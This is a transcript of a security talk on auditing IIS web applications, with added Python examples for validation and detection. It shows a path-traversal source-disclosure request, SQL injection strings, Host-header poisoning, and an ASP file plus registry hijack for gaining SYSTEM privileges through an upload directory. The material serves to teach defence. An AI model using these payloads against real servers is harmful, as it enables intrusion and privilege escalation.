Application Assessments on IIS (PowerPoint PPT presentation)

Post on 08-Jan-2016

TRANSCRIPT

Application Assessments on IIS

Welcome!

David Litchfield

(d.litchfield@atstake.com)

What is an Application Assessment?

Part of a network vulnerability assessment

Application provides the site functionality

Application is least tested but often proves to be the greatest risk

Vulnerability Scanners

• Cybercop

• I. S. S.

• Cerberus Internet Scanner

What scanners do do

They highlight known vulnerabilities in COTS products

Webhits.dll and null.htw

MSADC and RDS

Ism.dll and .htr overflow

%C0%AF UNICODE issue

What scanners don’t do

They won’t assess your application

Assessing the Application

What services does the site offer?

What functionality exists to provide these services?

What drives this functionality?

How does it do this?

Stocks-r-us.com

• Free charting service of current/real-time market trends

• A subscriber service providing detailed market analysis

• An “I’ve forgot my password” service

• A contact service

• Apply for a job with stocks-r-us.com online service

Free charting service of current/real-time market trends

• From a web form a user chooses the stock market

• They also choose a time range

• On submitting, a page called read_img.asp returns a graph of the ups and downs of the market:

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png

http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

Exception Handling

ASP Error 800814:

Create object failed in /includes/olectra.inc

Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and .inc has not been mapped to asp.dll

A search on google reveals Olectra Chart

Source code revelation!

Olectra creates a virtual directory called /octemp

When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”

The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png

/read_img.asp?IDN=../&IFN=read_img&IFE=asp
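An added example (not part of Litchfield's talk) showing the server-side checks read_img.asp was missing, plus a log check a defender can run afterwards: each of IDN, IFN and IFE is validated against a strict pattern (the 8-digit directory, alphabetic file name and png extension are assumptions drawn from the slide, not Olectra's own rules), the resulting path is confirmed to stay under /octemp, and IIS W3C log lines for read_img.asp whose parameters fail those checks are flagged. The log lines are constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs

# Allowlists for the three read_img.asp parameters. These patterns are
# assumptions for this example, derived from the formats seen in the slides.
IDN_RE = re.compile(r"^[0-9]{8}$")          # temp directory such as 00000008
IFN_RE = re.compile(r"^[A-Za-z]{1,16}$")    # random letters such as AXYZPQ
ALLOWED_IFE = {"png"}                       # the only extension the chart writes


def validate_chart_params(idn, ifn, ife):
    """Return (idn, ifn, ife) if every parameter is well formed, else None."""
    if not IDN_RE.match(idn) or not IFN_RE.match(ifn) or ife not in ALLOWED_IFE:
        return None
    return idn, ifn, ife


def resolve_chart_path(base_dir, idn, ifn, ife):
    """Build the on-disk path and refuse anything that escapes base_dir.

    Validation should already have rejected bad input; this containment check
    is defence in depth in case the patterns above are ever relaxed.
    """
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, idn, ifn + "." + ife))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def scan_iis_log(lines):
    """Flag read_img.asp requests whose query string fails validation.

    Expects W3C extended log lines with the field order
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
    Returns a list of (client ip, query string, status) tuples.
    """
    flagged = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, _time, client, _method, stem, query, status = fields[:7]
        if stem.lower() != "/read_img.asp":
            continue
        params = parse_qs(query if query != "-" else "", keep_blank_values=True)
        idn = params.get("IDN", [""])[0]
        ifn = params.get("IFN", [""])[0]
        ife = params.get("IFE", [""])[0]
        if validate_chart_params(idn, ifn, ife) is None:
            flagged.append((client, query, status))
    return flagged


# Constructed sample log lines (not real traffic), mirroring the requests above.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-12 10:15:22 192.0.2.10 GET /read_img.asp IDN=00000008&IFN=AXYZPQ&IFE=png 200
2001-03-12 10:15:31 192.0.2.10 GET /read_img.asp IDN=../&IFN=read_img&IFE=asp 200
2001-03-12 10:15:40 192.0.2.10 GET /read_img.asp IDN=&IFN=&IFE= 500
2001-03-12 10:16:02 192.0.2.11 GET /default.asp - 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print("suspicious read_img.asp request:", hit)
```

Both the source-disclosure request and the empty-parameter request that produced the Olectra error page fail validation, so the same allowlist serves as the input filter and as the detection rule over historic logs.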

SQL Queries

strSQL = "select price from stocks where name = '" _
    & request.querystring("company") & "'"

This code is insecure!!!

Why?

By setting the “company” parameter to something such as:

ISSX’ select * from master..sysxlogins

Would execute the two queries in batch mode:

Select price from stocks where name = 'ISSX' Select * from master..sysxlogins

‘sa’ login on MS SQL Server

xp_cmdshell extended stored procedure

On its own, ASP will not escape a single ‘ (quote mark)

.idc files will.

Change all ‘s provided in a parameter to 0x27 or strip them out

Consideration for integer input

strSQL = "Select company from stocks where price > " & request.querystring("price")

Again we can insert an arbitrary SQL query here and have it execute.

IsNumeric() for VBScript

isNaN() for JScript

Verifying numeric input

r.f.p – Rain Forest Puppy

http://www.wiretrip.net/rfp
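An added example, not from the talk, that runs the two flawed constructions above against an in-memory SQLite table of constructed rows, alongside their parameterised replacements and a strict numeric check. The string case shows that a single quote in the company parameter changes the query; the integer case shows that no quote is needed at all. One difference from the talk: SQL Server executes the batched second statement the slide relies on, while Python's sqlite3 module refuses stacked statements, which batch_refused() shows.

```python
import re
import sqlite3

# Constructed sample table (not the talk's data).
ROWS = [("ISSX", 42.5), ("ACME", 10.0), ("STKS", 99.0)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table stocks (name text, price real)")
    conn.executemany("insert into stocks values (?, ?)", ROWS)
    return conn


def price_unsafe(conn, company):
    # Same construction as the slide's strSQL: the quote is the only delimiter
    # and the caller's input is pasted straight into it.
    sql = "select price from stocks where name = '" + company + "'"
    return [row[0] for row in conn.execute(sql)]


def price_safe(conn, company):
    # Parameterised: the driver never interprets the value as SQL text.
    rows = conn.execute("select price from stocks where name = ?", (company,))
    return [row[0] for row in rows]


def above_price_unsafe(conn, price):
    # Integer context: there is no quote to break out of, and none is needed.
    sql = "select name from stocks where price > " + price
    return [row[0] for row in conn.execute(sql)]


NUMERIC_RE = re.compile(r"^-?[0-9]+(\.[0-9]+)?$")


def is_numeric(value):
    """Digits-only check, stricter than VBScript's IsNumeric()."""
    return bool(NUMERIC_RE.match(value))


def above_price_safe(conn, price):
    if not is_numeric(price):
        raise ValueError("price must be numeric")
    rows = conn.execute("select name from stocks where price > ?", (float(price),))
    return [row[0] for row in rows]


def batch_refused(conn):
    """True if the driver refuses a stacked second statement.

    SQL Server runs such a batch, which is what the slide relies on; the
    sqlite3 module raises (a Warning on older Pythons, ProgrammingError on newer).
    """
    try:
        price_unsafe(conn, "ISSX'; select name from stocks where '1'='1")
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(price_unsafe(db, "x' or '1'='1"))      # every price leaks
    print(price_safe(db, "x' or '1'='1"))        # nothing matches that literal
    print(above_price_unsafe(db, "50 or 1=1"))   # every company, no quote needed
    print(batch_refused(db))
```

The parameterised form is the fix for both cases; the numeric check is still worth keeping, because it rejects bad input before it reaches the database and gives a clear error instead of a type conversion failure.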

Contact Service

<%

..

Set SMTPObj = GetObject( _
    "IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC")

..

%>

HTTP SERVER_NAME Poisoning

“Host:” HTTP Client Header field

• Learn the password hash for the IWAM account

• Enumerate SQL servers

• Proxy attacks

• Samples on IIS

• ADSI, Corba and COM
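An added example (not from the talk) of the check the contact service above lacks: IIS fills SERVER_NAME from the client's Host header, so the value has to be matched against the site's own hostnames before it is used to build an ADSI path. The allowlist and the two raw requests are constructed for the example.

```python
# Assumed deployment hostnames for stocks-r-us.com (not from the talk).
ALLOWED_HOSTS = {"www.stocks-r-us.com", "stocks-r-us.com"}


def parse_headers(raw_request):
    """Split a raw HTTP request into its header fields, names lower-cased."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if not line:                             # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def validated_server_name(headers, allowed=ALLOWED_HOSTS):
    """Return the Host header's host part if it is allowlisted, else None.

    This is the value IIS exposes as SERVER_NAME; a client can put anything
    in it, so only an exact allowlist match may be used server-side.
    """
    host = headers.get("host", "")
    # Drop an optional :port. Bracketed IPv6 literals would be mangled here,
    # but they are not on the allowlist in any case.
    hostname = host.split(":", 1)[0].strip().lower()
    if hostname not in allowed:
        return None
    return hostname


def smtp_adsi_path(server_name):
    """Build the ADSI path only from a validated, allowlisted name."""
    if server_name is None:
        raise ValueError("refusing to build an ADSI path from an unvalidated Host")
    return "IIS://" + server_name + "/SMTPSVC"


# Constructed requests: a normal one and one carrying a poisoned Host header.
GOOD_REQUEST = "GET /contact.asp HTTP/1.1\r\nHost: www.stocks-r-us.com:80\r\n\r\n"
BAD_REQUEST = "GET /contact.asp HTTP/1.1\r\nHost: attacker.example\r\n\r\n"

if __name__ == "__main__":
    for req in (GOOD_REQUEST, BAD_REQUEST):
        name = validated_server_name(parse_headers(req))
        print(repr(name), "->", smtp_adsi_path(name) if name else "rejected")
```

Because the allowlist maps every accepted request onto one of the site's configured names, the ADSI path can only ever point at the server itself; a simpler variant of the same fix is to ignore SERVER_NAME entirely and read the host from server-side configuration.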

On-line job application service

As part of this service, stocks-r-us.com allows the upload of curricula vitae / resumes

Client-side checking doesn't work

Scripting enabled on the /cvtemp virtual directory

Gaining SYSTEM Privileges using ASP

• IIS Security Model

• IUSR and IWAM accounts

Wscript.Shell Object

Set WSObj = CreateObject("wscript.shell")

• Read from the Registry

• Write to the Registry

• Execute commands

<%

' MSI.ASP: launches the two files dropped alongside it (see MSI.REG below)

Dim WshShell, strCMD, strCMD2, result

strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"

strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"

Set WshShell = Server.CreateObject("Wscript.Shell")

On Error Resume Next

result = WshShell.Run(strCMD)

result = WshShell.Run(strCMD2)

%>

MSI.ASP

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]

@="c:\\inetpub\\wwwroot\\foo.dll"

"ThreadingModel"="Both"

MSI.REG
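An added example (not from the talk) covering both the job-application upload and the dropped MSI.ASP / MSI.REG pair above. The server chooses the stored file name itself and accepts only document extensions, so a client-supplied name such as cv.asp never reaches the disk, and a scan of the upload directory flags script files as well as content that instantiates Wscript.Shell, launches cmd.exe or rewrites a CLSID's InProcServer32 key. The /cvtemp sample files, the extension policy and the pattern list are assumptions for the example.

```python
import re
import secrets

# Extensions the job-application upload may store (assumed policy).
ALLOWED_CV_EXT = {"doc", "pdf", "txt", "rtf"}
# Extensions IIS of the era would hand to a script engine; none belong in /cvtemp.
SCRIPT_EXT = {"asp", "asa", "inc", "htr", "idc", "shtml", "stm"}


def storage_name_for_upload(client_filename):
    """Return a server-chosen file name for an uploaded CV, or None to reject.

    The client's name is used only to pick an extension; the directory and
    base name are chosen here, so traversal and script names are irrelevant.
    """
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) < 2:
        return None
    if any(part in SCRIPT_EXT for part in parts[1:]):   # rejects cv.asp.pdf too
        return None
    ext = parts[-1]
    if ext not in ALLOWED_CV_EXT:
        return None
    return secrets.token_hex(8) + "." + ext


# Content patterns that have no business in an upload directory.
RISKY_PATTERNS = [
    ("Wscript.Shell instantiation",
     re.compile(r"createobject\s*\(\s*[\"']wscript\.shell[\"']", re.I)),
    ("FileSystemObject instantiation",
     re.compile(r"createobject\s*\(\s*[\"']scripting\.filesystemobject[\"']", re.I)),
    ("cmd.exe invocation", re.compile(r"\bcmd\.exe\b", re.I)),
    ("COM CLSID InProcServer32 override",
     re.compile(r"\\CLSID\\\{[0-9A-Fa-f-]+\}\\InProcServer32", re.I)),
]


def scan_upload_dir(files):
    """files maps relative path -> text content; returns (path, reason) findings."""
    findings = []
    for path, content in files.items():
        name = path.rsplit("/", 1)[-1]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in SCRIPT_EXT:
            findings.append((path, "script file in upload directory"))
        for label, pattern in RISKY_PATTERNS:
            if pattern.search(content):
                findings.append((path, label))
    return findings


# Constructed directory listing: one genuine CV and the two dropped files.
SAMPLE_FILES = {
    "cvtemp/3f9a0c7e1b2d4a5f.pdf": "%PDF-1.3 (constructed, harmless placeholder)",
    "cvtemp/msi.asp": (
        '<%\nSet WshShell = Server.CreateObject("Wscript.Shell")\n'
        'WshShell.Run "cmd.exe /c c:\\inetpub\\wwwroot\\msi.reg"\n%>'
    ),
    "cvtemp/msi.reg": (
        "REGEDIT4\n"
        "[HKEY_CLASSES_ROOT\\CLSID\\{000C103E-0000-0000-C000-000000000046}"
        "\\InProcServer32]\n"
    ),
}

if __name__ == "__main__":
    for path, reason in scan_upload_dir(SAMPLE_FILES):
        print(path, "->", reason)
```

The naming rule removes the upload as a way of getting script onto the server; removing the script mapping from the /cvtemp virtual directory is the second, independent control, and the scan is what tells you whether either has already failed.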

Summary

• Understand the technology you’re dealing with

• Never trust user input – anywhere

• Ensure permissions are set properly

• Don’t trust third-party software until truly evaluated

• Don’t rely on client side checking

• Scanners won’t find these problems – you will

Questions?

Thanks and enjoy the rest of the day!
